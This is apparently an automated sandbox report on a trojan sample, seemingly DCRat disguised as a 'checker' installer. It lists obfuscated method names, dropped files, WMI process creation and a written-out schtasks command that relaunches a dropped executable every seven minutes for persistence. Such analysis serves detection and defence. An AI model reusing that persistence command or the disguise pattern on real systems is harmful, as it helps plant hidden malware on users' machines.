                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, IQgcRJp6myeYm5oS483.csHigh entropy of concatenated method names: 'GkgXWhS3D8', 'S84XPyRtrj', 'mm3XEZTpni', 'AYkgO0PlYW3l2iCCOSOH', 'n7XDqpPlusJtLvVNr0jr', 'I5USd1PlKnOvFjewkQBn', 'HJeperi4yU', 'munpwP2RUd', 'JNgpiRvhpK', 'y0BpneJ4cn'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, Y22Kg9HsG4IShK4ve9Q.csHigh entropy of concatenated method names: 'ggcIWpp61Z', 'u7CIPrktFk', 'FHsIETlUxp', 'v3tIcQXZjk', 'ubOIVWrivs', 'AAP7i0PtUtQqtbd1iC0A', 'wqCpiGPt7v0MZ7g1w8hx', 'OXBikDPtTNjS463twCoV', 'WSGorbPtH4wAquj0sBHX', 'ESVD5sPtIVfl4rkSFxrw'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, orVLMXEJPhMal4vtLDs.csHigh entropy of concatenated method names: 'sMwEtfi0qp', 'c9sQ6JP8mKgIvQoFDqyc', 'YIMQLXP8kIxjbSoOFQ3S', 'PTX47wP8ZEtWvGnJstc0', 'dvAloRP83q2ETLyIfScV', 'WwYLHAP8ANljSejTVRle', 'AfpEONXZkT', 'h6jElkPHKa', 'OdNErSJweH', 'e36EM334o4'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, Fn4I2k0VD332F4EsjfA.csHigh entropy of concatenated method names: 'vKo0pj0kDy', 'xcs0XiN28e', 'qi10yVZKvw', 'HWL0gHwwD5', '_0023Nn', 'Dispose', 'rNQF0SPYvPwNDTbP64t5', 'v8rs0wPYBcu4LbfiCYqG', 'ylQnHtPYhY8iTSwfGNrD', 'cYHYVrPYNOZAChBMI10V'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, ROuXmmRZfJ3Y7ku0lRp.csHigh entropy of concatenated method names: 'NsHRlfZfPL', 'axfRrPR5dI', 'sGkRMWxeNf', 'RDeRfbwoVo', 'nQGRdHtsBu', 'MywRatN8nj', 'IhRR48iExq', 'w8ZRtswnAI', 'u6OR9MBoPf', 'dsIRLFZ5Yp'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, mbEZgqEy43aJP9LZ9Yt.csHigh entropy of concatenated method names: 'Pe2EjEOK3C', 'xR2EbOKAk0', 'f3SEUDOmdi', 'zWx5m9P5nOIVAHMsXSui', 'kMfwmRP5wBqLKcj0rOkf', 'XjdbmHP5iLX6XGCYM9yY', 'LH9oFhP5DDR5A9bOyHXA', 'oSnwVGP50yHFUb0vxfwW', 'nxOJZ8P5SXXgXP55NV0s', 'USNp3HP5uR38DwMQTngC'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, G6wdofVMPB8Xm2PXZdu.csHigh entropy of concatenated method names: 'wQZVd1eTNb', 'PCHVaY9HvY', 'DfQQj1PFMQHvrGYqmcv2', 'ftBA9yPFfEUPYRIflVZw', 'H1ND17PFdQ6TxyCsRlLS', 'Dt3QWPPFaspeNqeyB0TB', 'p6RThtPF4ou35ttRNxKq', 'q05RtQPFtELJZUALHlpg', 'Bj4o9XPF9rWNLBFYXQ8A'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, VONH6ZRBck0LT59jToQ.csHigh entropy of concatenated method names: 'XQJEphIDm9P', 'bqfEpN51ef4', 'b1kBvYPsQy6OVb3OFyCA', 'OY5kIVPskx8P0W9trhfv', 'acEJwsPsZQUL8ZshpkDc', 'SDStSTPsmyOsv1aAnWFc', 'zplBEgPs3HR9aK5GuIWa'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, sEy7PPxmEaWZWEjVqX2.csHigh entropy of concatenated method names: 'iDixMmCTxt', 'HRBxfd95gN', 'fSDew2POOf8SgMK1GwEK', 'JOh0EiPOlKrDvBpKMJhN', 'LPm3yyPOrc2XmK3midIk', 'UklxAj0IpX', 'Uk2x2uoj7F', 'kbWxq9covJ', 'redx1VbAXQ', 'LPUx5e5Dpy'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, j0v7ClTHh2LSLnu6RKg.csHigh entropy of concatenated method names: 'BFDTvcHDh1', 'BXPTB20pwP', 'xacTheSW3s', 'hiQh3IP45l8XPdQYK1DK', 'ftnaYmP4qICvZ395q9Rg', 'kqxkXHP41XhZbKEiwJlH', 'pYm3wZP48914yhkeDiAs', 'xEqcmlP4J90Stt0aGHR8', 'pZMFI4P4FUK7LZjBGoNk'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, tEKB20jYsCoCN4ugihH.csHigh entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'DQhjRS78Bt', 'BM1Py9ZiDP6', 'E3DjsqfOdA', 'Ms0PyLSj6tu', 'QwB4AuPdRRkOxbSrMDBw', 'CkJvYJPdYD1mMy9TXQFq', 'yu2ei1PdCaeEwB2Slf3J'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, RKnKBN8kxRoEokhBv5A.csHigh entropy of concatenated method names: 'W9L8mLWMjq', 'Uks83uOsaa', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'MuS8Ay942M', '_96S', '_9s5'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, frT9WSx7KUVpAqAhOZL.csHigh entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'uq8PykL8DYq', 'e9jPczqMGhv', 'ejZj2RPOIdeEeJLGHfUx', 'qFXO2WPOvoOujIlSF4iF', 'q2wH9RPOBG5MONxOfvxG', 'UECjHXPOhq4oIhBtnyDU', '_6l7'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, BKJdS9EPgm7tZTr153j.csHigh entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'PrUPyQ3HpMJ', 'QVHPcnQW3if', 'XM4uvmP5tn7qKqpaZN7W', 'XrJicFP59dTwwBeBpwaj', 'HvZknyP5LJFlkNkAEktH'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, xtueugBSWqSbkQ841b2.csHigh entropy of concatenated method names: 'u1kDVTPGeY0yAg7OsfOs', 'JSagi6PGwnZQrjY6Ov8j', 'djJgg5PGi4asXktoshZl', 'kVIm2BpCSg', 'xIgOGgPGScVcKUodrcZh', 'lFfYPsPGDccwnmFTItVp', 'OVBtRTPG0d5mUkDUej0C', 'nYjxQAPGuEqAVo0P7g0v', 'UlPLyRPGKBVdZMFQVol6', 'Cwpm5KRYaZ'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, doaogxFK4NguqBQ3UEW.csHigh entropy of concatenated method names: '_2JN', 'A67', '_49I', 'WxWFC2owoX', 'Yk3FRNVI2L', 'qdyFsNItVu', 'no9Fz5Qcjq', 'wegOW1cmPk', 'sEvOPhwwyh', 'hB6vIUPnMrYDX0QFTp3m'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, wXHnSVdhUW6HVo7oae6.csHigh entropy of concatenated method names: 'a7hdQwASwL', 'lmIdkjsyI2', 'TLjdZSFSwu', 'UtSdmUJAeq', 'r8hd3rUe58', 'IhidApLBQI', 'pghd2AO7uB', 'kqLdq4I3NW', 'hT8d1iTTfC', 'fGad5vfS6Z'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, wOpr12PqyLlMwplBZWS.csHigh entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'XshPyIs1mSg', 'QVHPcnQW3if', 'IedVr1P1KQcbjbhkkJt5', 'B5qO8pP1Y1WN8gWj6ql3', 'nmfyOnP1CRjSIAYRD6J9'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, v7SV9OywgqY5yWJq6eG.csHigh entropy of concatenated method names: 'YUxyufEVSa', 'LAbyKXtppI', 'wihyY7PZH7', 'k9oyCZcQRW', 'SC9yRVRX0I', 'pd7ysuhSgG', 'Fg5yzswiA3', 'aVHEgbPMdvMfAvvwHktf', 'bph8ToPMaYbhInTPD9tZ', 'hoWGofPM4HEcJ9KfBA2r'

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\OfhhMrNQ.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\UvPgJftz.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeFile created: C:\Users\user\AppData\Local\Temp\MSI47C9.tmpJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exeJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\lNILRSep.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeFile created: C:\Users\user\AppData\Local\Temp\MSI46ED.tmpJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeFile created: C:\Users\user\AppData\Local\Temp\MSI44B9.tmpJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\UplOiJFY.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\yYksYVbT.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeFile created: C:\Users\user\AppData\Local\Temp\shi436E.tmpJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4DB5.tmpJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\MAAYLQkP.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\OWmHElNj.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\wKKCkQsU.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\BXyiPEuJ.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\lzmaextractor.dllJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\lealJKxT.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\XaQepXPR.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\gaqNoVOB.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\jUtdfVsr.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeFile created: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4DD5.tmpJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\LMwQZDoR.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\pAGUOyAM.logJump to dropped file
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeFile created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4A94.tmpJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\GKQhrBJx.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\YTLXwDIz.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\SFtfhzmX.logJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4C8A.tmpJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\ShortcutFlags.dllJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exeJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4D85.tmpJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\xqfrsuNN.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\zbqSUreo.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\SEFybwug.logJump to dropped file
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeFile created: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\vSFbtVsB.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeFile created: C:\Users\user\AppData\Local\Temp\MSI43FC.tmpJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\hwUMgwXg.logJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4B03.tmpJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\vlAbNuev.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\lKQdHBzT.logJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4A36.tmpJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\jyGvCfcb.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\aHPfiQDx.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\ZkmfqpvS.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\nBMUCfZn.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\dYYVtYJg.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\AOGsABiv.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeFile created: C:\Users\user\AppData\Local\Temp\MSI447A.tmpJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\Default\Favorites\ApplicationFrameHost.exeJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\XgvwQtEs.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\jLWdviZu.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\JrPikvxc.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\ClgJzaDG.logJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4969.tmpJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\uAoBkxMT.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\yYksYVbT.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\ZkmfqpvS.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\XaQepXPR.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\nBMUCfZn.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\UplOiJFY.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\BXyiPEuJ.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\jLWdviZu.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\SEFybwug.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\GKQhrBJx.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\gaqNoVOB.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\lNILRSep.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\ClgJzaDG.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\jUtdfVsr.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\xqfrsuNN.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\OWmHElNj.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\wKKCkQsU.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\uAoBkxMT.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile created: C:\Users\user\Desktop\SFtfhzmX.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\vSFbtVsB.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\lealJKxT.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\jyGvCfcb.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\pAGUOyAM.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\MAAYLQkP.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\lKQdHBzT.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\zbqSUreo.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\XgvwQtEs.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\vlAbNuev.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\dYYVtYJg.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\UvPgJftz.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\LMwQZDoR.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\aHPfiQDx.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\JrPikvxc.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\AOGsABiv.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\hwUMgwXg.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\YTLXwDIz.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile created: C:\Users\user\Desktop\OfhhMrNQ.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Uses schtasks.exe or at.exe to add and modify task schedules
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
